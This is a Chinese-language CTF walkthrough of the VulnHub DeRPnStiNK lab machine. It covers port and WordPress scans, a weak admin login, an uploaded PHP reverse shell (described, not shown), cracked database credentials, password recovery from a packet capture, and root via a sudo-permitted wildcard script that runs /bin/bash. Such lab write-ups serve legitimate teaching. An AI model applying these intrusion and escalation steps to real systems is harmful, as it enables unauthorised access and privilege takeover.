首页 > 其他分享 >vulnhub之VulnHub2018_DeRPnStiNK

vulnhub之VulnHub2018_DeRPnStiNK

时间:2023-06-24 22:12:06浏览次数:33  
标签:12 http open 192.168 weblog DeRPnStiNK vulnhub 62.198 VulnHub2018

一、信息获取

1、tcp开放端口获取

─$ cat tcp_open_port.nmap
# Nmap 7.93 scan initiated Sat Jun 24 16:48:23 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.62.198
Nmap scan report for 192.168.62.198
Host is up (0.0014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:F8:1C:93 (VMware)

# Nmap done at Sat Jun 24 16:48:29 2023 -- 1 IP address (1 host up) scanned in 6.30 seconds

  可以看到tcp开放了21,22,和80端口

2、udp端口信息获取

─$ cat udp_open_port.nmap
# Nmap 7.93 scan initiated Sat Jun 24 16:48:29 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.62.198
Warning: 192.168.62.198 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.198
Host is up (0.0010s latency).
Not shown: 65456 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
5353/udp open zeroconf
MAC Address: 00:0C:29:F8:1C:93 (VMware)

# Nmap done at Sat Jun 24 16:49:42 2023 -- 1 IP address (1 host up) scanned in 72.76 seconds

  可以看到5353 udp端口。

3、nmap开放端口服务、默认漏洞脚本扫描

┌──(kali㉿kali)-[~/vulnhub/VulnHub2018_DeRPnStiNK]
└─$ cat open_port_service.nmap 
# Nmap 7.93 scan initiated Sat Jun 24 16:49:43 2023 as: nmap -sT -sV -O -sC -p21,22,80, -oA open_port_service 192.168.62.198
Nmap scan report for 192.168.62.198
Host is up (0.00067s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 124ef86e7b6cc6d87cd82977d10beb72 (DSA)
|   2048 72c51c5f817bdd1afb2e5967fea6912f (RSA)
|   256 06770f4b960a3a2c3bf08c2b57b597bc (ECDSA)
|_  256 28e8ed7c607f196ce3247931caab5d2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: DeRPnStiNK
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:F8:1C:93 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 24 16:49:53 2023 -- 1 IP address (1 host up) scanned in 10.29 seconds
                                                                                                  

4、nmap漏洞脚本扫描

└─$ cat vuln_scan.nmap        
# Nmap 7.93 scan initiated Sat Jun 24 16:49:53 2023 as: nmap --script=vuln -p21,22,80, -oA vuln_scan 192.168.62.198
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.62.198
Host is up (0.00091s latency).

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
| http-sql-injection: 
|   Possible sqli for queries:
|_    http://192.168.62.198:80/is/js/release/kveik.1.4.24.js?1=%27%20OR%20sqlspider
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|_  /weblog/wp-login.php: Wordpress login page.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:F8:1C:93 (VMware)

# Nmap done at Sat Jun 24 16:55:38 2023 -- 1 IP address (1 host up) scanned in 345.11 seconds

  信息收集差不多结束,确认一下渗透优先级。①21端口优先查看,看是能够进行匿名登录进而获取敏感信息。②80端口。③21端口和80端口卡住无法再渗透下去,再用收集到的信息渗透22端口。

二、获取SHELL

1、21端口渗透

尝试ftp匿名登录,不可行

2、80端口渗透

①老规矩,先进行目录爆破

└─$ cat web_scan.txt
/weblog (Status: 301) [Size: 316] [--> http://192.168.62.198/weblog/]
/php (Status: 301) [Size: 313] [--> http://192.168.62.198/php/]
/css (Status: 301) [Size: 313] [--> http://192.168.62.198/css/]
/js (Status: 301) [Size: 312] [--> http://192.168.62.198/js/]
/javascript (Status: 301) [Size: 320] [--> http://192.168.62.198/javascript/]
/temporary (Status: 301) [Size: 319] [--> http://192.168.62.198/temporary/]
/server-status (Status: 403) [Size: 294]

 ②robots.txt信息获取

  发现php和temporary两个目录

③php目录无法访问,temporary下经典try harder语句。

 

④访问weblog目录,发现速度很慢且有域名解析,看网页源码发现有derpnstink.local域名信息

 ⑤/etc/hosts添加域名信息,用域名访问weblog目录,发现加载正常。

 ⑥页面底部发现wordpress信息

 ⑦wpscan进行信息扫描

┌──(kali㉿kali)-[~/vulnhub/VulnHub2018_DeRPnStiNK]                                                                                                                                                     [66/1789]
└─$ wpscan -u http://derpnstink.local/weblog -e                                                                                                                                                                                         
_______________________________________________________________                                                                                                                                                 
         __          _______   _____                                                                                                                                                                            
         \ \        / /  __ \ / ____|                                                                                                                                                                           
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                                                                                          
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                                           
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                                          
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                                          
                                                                                                                                                                                                                
         WordPress Security Scanner by the WPScan Team                                                                                                                                                          
                         Version 3.8.22                                                                                                                                                                         
       Sponsored by Automattic - https://automattic.com/                                                                                                                                                        
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                                                                                                                                                          
_______________________________________________________________                                                                                                                                                 
                                                                                                                                                                                                                
[+] URL: http://derpnstink.local/weblog/ [192.168.62.198]                                                                                                                                                       
[+] Started: Sat Jun 24 17:00:16 2023                                                                                                                                                                           
                                                                                                                                                                                                                
Interesting Finding(s):                                                                                                                                                                                         
                                                                                                                                                                                                                
[+] Headers                                                                                                                                                                                                     
 | Interesting Entries:                                                                                                                                                                                         
 |  - Server: Apache/2.4.7 (Ubuntu)                                                                                                                                                                             
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22                                                                                                                                                                       
 | Found By: Headers (Passive Detection)                                                                                                                                                                        
 | Confidence: 100%                                                                                                                                                                                             
                                                                                                                                                                                                                
[+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php                                                                                                                                      
 | Found By: Headers (Passive Detection)                                                                                                                                                                        
 | Confidence: 100%                                                                                                                                                                                             
 | Confirmed By:                                                                                                                                                                                                
 |  - Link Tag (Passive Detection), 30% confidence                                                                                                                                                              
 |  - Direct Access (Aggressive Detection), 100% confidence                                                                                                                                                     
 | References:                                                                                                                                                                                                  
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
| Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.9 identified (Insecure, released on 2017-11-29).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.6.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.9'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.9
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.9, Match: 'Version: 1.3'


[i] No plugins Found.


[i] No themes Found.


[i] No Timthumbs Found.


[i] No Config Backups Found.


[i] No DB Exports Found.


[i] No Medias Found.


[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jun 24 17:00:28 2023
[+] Requests Done: 3433
[+] Cached Requests: 11
[+] Data Sent: 1012.169 KB
[+] Data Received: 815.408 KB
[+] Memory used: 259.617 MB
[+] Elapsed time: 00:00:12

  枚举出admin用户

⑧打开登陆界面http://derpnstink.local/weblog/wp-login.php

  输入admin/admin进行登陆(本来想手动试几个弱密码,没想到第一个直接进去了,当时我也一脸懵逼。也可以使用wpscan或者hydra进行爆破)

 ⑨随意翻找,发现Slideshow 编辑功能中有上传文件功能,直接上传php的反弹shell,link to到weblog目录首页

 

 ⑩kali监听本地443端口,admin页面点击link的open字样,接收反弹shell

三、提权

①、提升与系统的交互性

  python3 -c 'import pty;pty.spawn("/bin/bash")'

  注:可以用dpgk -l|grep python 查看安装有那个版本的python

②、网站能够进行登陆,第一时间查找数据库配置文件

 ③使用配置文件中的用户名和密码进入数据库,查找每个库下的用户信息

   wordpress库下有两个用户,将密码复制出来找个在线网站爆破。发现admin用户密码可以爆破而另一个爆破不出来。

   mysql.user下7条信息,但是有四条唯一,复制出来一一解密:

  能够解密出来的有:

root/mysql
unclestinky/wedgie57
phpmyadmin/admin

④尝试使用mysql ud提权

  看到连接数据库的用户为root,第一反应就应该是尝试udf提权。但是secure_file_priv不为空且与plugin_dir参数值不同,因此排除udf提权。

 ⑤使用得到的密码尝试切换到其他用户,发现使用wedgie57可以切换到stinky用户

 ⑥随处翻找/home/stinky/ftp/files/network-logs下有个derpissues.txt文件,信息为

cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay

⑦/home/stinky/Documents下有derpissues.pcap包文件

   根据两个文件的命名,不难猜出包中记录的是derpissues.txt文件中解决问题过程中产生的流量信息。

⑧靶机执行python3 -m http.server 9999 & 命令,供kali攻击机下载抓包文件。

⑨kali打开wirshark,加载下载到的包,搜索http协议包(我这里有大致思路因此这么操作,如果没有思路不建议这么操作,还是需要慢慢查看流量信息,否则可能会遗漏关键信息。我如果看完http所有包没得到有用信息也会老老实实的一条条看),发现有两条POST /weblog/wp-admin/user-new.php HTTP/1.1  (application/x-www-form-urlencoded)信息,点击后发现酷似为密码的信息:derpderpderpderpderpderpderp

⑩切换到mrderp用户

 ⑪sudo -l 查看有哪些特权,发现可以不用root密码执行/home/mrderp/binaries/derpy*,这就好办了。

 ⑫新建/home/mrderp/binaries目录,

  mkdir binaries

  然后直接echo "/bin/bash" >>/home/mrderp/binaries/derpy_shell.sh,chmod 777 /home/mrderp/binaries/derpy_shell.sh,然后sudo /home/mrderp/binaries/derpy_shell.sh,提权成功。

 个人碎碎念

  1、对于我来说,这台靶机getshell是比较容易的。刚刚开始打的时候看到wordpress,以为又要获取到用户名后用hydra或者wpscan进行爆破,因为本人笔记本配置极低,kali配置就更低了,因此一般每分钟只能试300~400个密码,如果真爆破起来又是煎熬的等待时间。、

  2、上传文件后没看到上传路径,以为要再目录爆破一遍,没想到随便点点然后再看kali已经收到反弹shell了。

  3、提权过程中也有例行的/etc/crontab、/etc/passwd、/etc/shadow、/etc/sudoers文件信息查看,suid,sgid文件查询,因为手动信息枚举的时候没看到抓包文件,也想尝试sudo 漏洞本地提权但没成,后面用自动枚举脚本linpeas.sh发现了抓包文件才把思路串起来,不然就要去试linpeas.sh中建议的提权方式了。

  4、完事。

  

标签:12,http,open,192.168,weblog,DeRPnStiNK,vulnhub,62.198,VulnHub2018
From: https://www.cnblogs.com/xiaoliyulixianji/p/17501768.html

相关文章

  • vulnhub靶机练习:01-Empire-Lupin-One
    这次用的是OracleVMVirtualBox,避免用vmware出现的问题靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/arp-scan-l  扫描ip kali:172.88.6.144靶场:172.88.6.63/1、扫描ipnmap-A-sV-T4-p-172.88.6.63 1.1尝试访问ip 1.2目录扫描    d......
  • vulnhub靶场搭建
    vulnhub靶场搭建kali虚拟机安装1、更新sudoapt-getupdate2、安装docker.iosudoaptinstalldocker.io3、验证安装docker-v4、安装docker-composepipinstalldocker-compose5、拉取镜像gitclonehttps://github.com/vulhub/vulhub.git6、进行测试cdvulnhub......
  • vulnhub-xxe靶场通关(xxe漏洞续)
    vulnhub-xxe靶场通关(xxe漏洞续)下面简单介绍一个关于xxe漏洞的一个靶场,靶场来源:https://www.vulnhub.com这里面有很多的靶场。靶场环境需要自己下载:https://download.vulnhub.com/xxe/XXE.zip因为是外国的靶场,下载速度有点慢,也可以通过公众号——星光安全,回复“xxe靶场”获得。......
  • Vulnhub: Corrosion:2靶机
    kali:192.168.111.111靶机:192.168.111.131信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.131通过nmap脚本枚举出8080端口存在backup.zip文件,下载后解压发现需要密码,利用john爆破压缩包密码得到密码:@administrator_hi5zip2johnbackup.zip......
  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)
    Cengbox2识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Cengbox2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • vulnhub靶场:matrix-breakout-2-morpheus
    这个靶场的链接不小心给关闭了,所以只能自己去搜了,好像这个靶场需要用virtualbox,但是我的好像有问题,所以用VMware了,这是我打开后的样子我的kali的ip:192.168.13.129对靶场进项扫描nmap-sP65535192.168.13.0/24稍微判断下,锁定在147和254然后扫描它,发现147是靶场的ip  ......
  • Vulnhub: Corrosion靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130目录爆破blog-post目录下存在两个目录对archives目录中的randylogs.php进行测试发现存在文件包含wfuzz-c-w/opt/zidian/SecLists-2022.2/Di......
  • 渗透笔记:vulnhub靶机drippingblues--第一篇测试记录
    在不知道靶场的ip情况下进行扫描 出现有几个ip,但是不知道哪个是的,所以就一个个试一试namp-T4-sV-A-O-p- 192.168.13.143-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-(所有端口)扫了好几个,只有一个是的,所以不是的就没有发出来了 ftp一下ip,发现有一......
  • Vulnhub: ICA:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标80,发现目标CMS为qdPM9.2搜索对应漏洞发现存在信息泄露searchsploitqdpm访问192.168.111.130/core/config/databases.yml得到目标......
  • VulnHub-Bob: 1.0.1
    靶机地址:https://www.vulnhub.com/entry/bob-101,226/目标:YourGoalistogettheflagin/提示:Remembertolookforhiddeninfo/files一、信息收集1、主机及服务发现1.1主机扫描使用arp-scan确定目标靶机(192.168.0.10)arp-scan-l┌──(root㉿kali)-[~]└─#......